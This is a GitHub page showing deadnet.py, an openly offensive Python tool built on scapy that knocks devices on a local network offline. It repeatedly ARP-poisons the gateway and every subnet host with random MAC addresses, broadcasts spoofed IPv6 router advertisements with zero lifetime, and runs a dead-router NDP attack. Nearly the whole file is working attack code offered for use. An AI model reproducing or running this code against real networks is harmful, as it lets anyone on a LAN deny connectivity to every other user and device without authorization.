-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathdeadnet.py
executable file
·202 lines (176 loc) · 9.08 KB
/
deadnet.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
#!/usr/bin/env python3
import ipaddress
import logging
import netifaces
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # suppress warnings
from scapy.all import *
from utils import *
conf.verb = 0
# --------------------------------------------------------------------------------------------------------------------
# ....................................................................................................................
# ....................................................................................................................
# ....................................... ____ ............... _ _ . _ .... _ ........................................
# .......................................| _ \ ___ __ _ __| | \ | | ___| |_ ......................................
# .......................................| | | |/ _ \/ _` |/ _` | \| |/ _ \ __|......................................
# .......................................| |_| | __/ (_| | (_| | |\ | __/ |_ ......................................
# .......................................|____/ \___|\__,_|\__,_|_| \_|\___|\__|......................................
# ....................................................................................................................
# Ⓒ by https://github.com/flashnuke Ⓒ................................................................................
# --------------------------------------------------------------------------------------------------------------------
class DeadNet:
def __init__(self, iface, cidrlen, s_time, gateway, disable_ipv6, ipv6_preflen):
self.network_interface = iface
self.arp_poison_interval = s_time
self.ipv6_preflen = ipv6_preflen or IPV6_PREFLEN
conf.iface = self.network_interface
self.cidrlen_ipv4 = cidrlen
self.spoof_ipv6ra = not disable_ipv6
self.user_ipv4 = get_if_addr(self.network_interface)
self.subnet_ipv4 = self.user_ipv4.split(".")[:3]
self.subnet_ipv4_sr = f"{'.'.join(self.subnet_ipv4)}.0/{self.cidrlen_ipv4}"
self.gateway_ipv4 = gateway or self.get_gateway_ipv4(self.network_interface)
if not self.gateway_ipv4:
raise Exception(f"{RED}[!]{WHITE} Unable to automatically set IPv4 gateway address, try setting manually"
f" by passing (-g, --set-gateway)...")
self.gateway_mac = self.get_gateway_mac()
if not self.gateway_mac:
raise Exception(f"{RED}[-]{WHITE} Unable to get gateway mac -> {self.gateway_ipv4}")
self.gateway_ipv6 = mac2ipv6_ll(self.gateway_mac, IPV6_LL_PREF)
self.print_settings()
self.host_ipv4s = [str(host_ip) for host_ip in ipaddress.IPv4Network(self.subnet_ipv4_sr) if
str(host_ip) != self.user_ipv4 and str(host_ip) != self.gateway_ipv4]
printf(f"{BLUE}[*]{WHITE} Generated {len(self.host_ipv4s)} possible IPV4 hosts")
if self.spoof_ipv6ra:
printf(f"{BLUE}[*]{WHITE} IPv6 RA spoof is enabled, setting up...")
if not os_is_windows():
printf(f"{BLUE}[*]{WHITE} Pinging IPv6 subnet for hosts...")
printf(f"{BLUE}[+]{WHITE} Found {len(self.get_all_hosts_ipv6())} IPv6 hosts during setup")
else:
printf(f"{RED}[-]{WHITE} Windows does not support ping6, skipping...")
else:
printf(f"{RED}[-]{WHITE} IPv6 RA spoof is disabled, skipping ping6...")
self.abort = False
def get_gateway_mac(self):
gateway_hwaddr = getmacbyip(self.gateway_ipv4) # fetch MAC using ARP req
if not gateway_hwaddr:
try:
result = subprocess.run(['ip', 'neighbor', 'show', 'default'], capture_output=True, text=True)
output = result.stdout.strip()
for line in output.split('\n'):
columns = line.split()
if len(columns) >= 4:
if columns[3] == 'lladdr' and columns[4] != '<incomplete>' and columns[2] == iface:
gateway_hwaddr = columns[4]
break
except Exception as exc:
pass
return gateway_hwaddr
def user_abort(self):
printf(DELIM)
printf(f"{RED}[-]{WHITE} User requested to stop...")
self.abort = True
exit()
def print_settings(self):
printf("- net iface" + self.network_interface.rjust(38))
printf("- sleep time" + str(self.arp_poison_interval).rjust(32) + "[sec]")
printf("- IPv4 subnet" + self.subnet_ipv4_sr.rjust(36))
printf("- IPv4 gateway" + self.gateway_ipv4.rjust(35))
printf("- IPv6 gateway" + self.gateway_ipv6.rjust(35))
printf("- IPv6 preflen" + str(self.ipv6_preflen).rjust(35))
printf("- spoof IPv6 RA" + str(self.spoof_ipv6ra).rjust(34))
printf(DELIM)
def get_all_hosts_ipv6(self) -> List[str]:
ipv6_hosts = list()
try:
ping_output = subprocess.check_output(['ping6', '-I', self.network_interface,
IPV6_MULTIC_ADDR, "-c", "3"], stderr=subprocess.DEVNULL).decode()
for line in ping_output.splitlines():
s_idx = line.find(IPV6_LL_PREF)
e_idx = line.find(f"%{self.network_interface}")
if s_idx > 0 and e_idx > 0:
host = line[s_idx:e_idx]
if host not in ipv6_hosts:
ipv6_hosts.append(host) # returns None on fail
except Exception as exc:
pass
except KeyboardInterrupt:
self.user_abort()
return ipv6_hosts
def poison_arp(self):
"""
* poison the gateway arp cache with a spoofed mac address for every possible host
* poison every possible host with a spoofed mac address for the gateway
"""
for host_ip in self.host_ipv4s:
arp_packet_gateway = ARP(op=2, psrc=host_ip, hwdst=self.gateway_mac, hwsrc=RandMAC(),
pdst=self.gateway_ipv4)
sendp(Ether() / arp_packet_gateway, iface=self.network_interface)
# poison host's arp cache
arp_packet_host = ARP(op=2, psrc=self.gateway_ipv4, hwsrc=RandMAC(), pdst=host_ip)
sendp(Ether(dst="ff:ff:ff:ff:ff:ff") / arp_packet_host, iface=self.network_interface)
def poison_ra(self):
"""
* Broadcast a fake dead router message periodically
"""
rand_mac = RandMAC()
spoofed_mc_ra = Ether(src=rand_mac) / \
IPv6(src=self.gateway_ipv6, dst=IPV6_MULTIC_ADDR) / \
ICMPv6ND_RA(chlim=255, routerlifetime=0, reachabletime=0) / \
ICMPv6NDOptSrcLLAddr(lladdr=rand_mac) / \
ICMPv6NDOptMTU() / \
ICMPv6NDOptPrefixInfo(prefixlen=self.ipv6_preflen, prefix=f"{IPV6_LL_PREF}::")
sendp(spoofed_mc_ra)
def dead_router_attack(self):
"""
* Monitor RA messages and immediately send fake zero-lifetime RA packets
"""
NDP_Attack_Kill_Default_Router(iface=self.network_interface)
def start_attack(self):
loop_count = 0
printf(DELIM)
if os_is_linux():
printf("")
printf("")
if self.spoof_ipv6ra:
threading.Thread(target=self.dead_router_attack, daemon=True).start()
while not self.abort:
try:
loop_count += 1
now = get_ts_ms()
self.poison_arp()
if self.spoof_ipv6ra:
self.poison_ra()
if os_is_linux():
printf(2 * "\x1b[1A\x1b[2K")
printf(f"{GREEN}[+]{WHITE} attacking..." + f"cycle #{str(loop_count)}"
f" duration {get_ts_ms() - now}[ms]".rjust(33))
time.sleep(self.arp_poison_interval)
except Exception as exc:
printf(DELIM)
printf(f"{RED}[!]{WHITE} Exception caught -> {exc}")
printf(traceback.format_exc())
self.abort = True
except KeyboardInterrupt:
self.user_abort()
@staticmethod
def get_gateway_ipv4(iface):
try:
gateways = netifaces.gateways()
ipv4_gateways = gateways[netifaces.AF_INET] # ipv4 gateways
for ipv4_data in ipv4_gateways:
if ipv4_data[1] == iface:
return ipv4_data[0]
except Exception:
pass # try scapy instead
try:
return [r[2] for r in conf.route.routes if r[3] == iface and r[2] != '0.0.0.0'][0]
except Exception:
pass
if __name__ == "__main__":
print(f"\n{BANNER}\nWritten by @flashnuke")
print(DELIM)
arguments = define_args()
invalidate_print() # after arg parsing
attacker = DeadNet(arguments.iface, arguments.cidrlen, arguments.s_time, arguments.gateway,
arguments.disable_ipv6, arguments.preflen)
attacker.start_attack()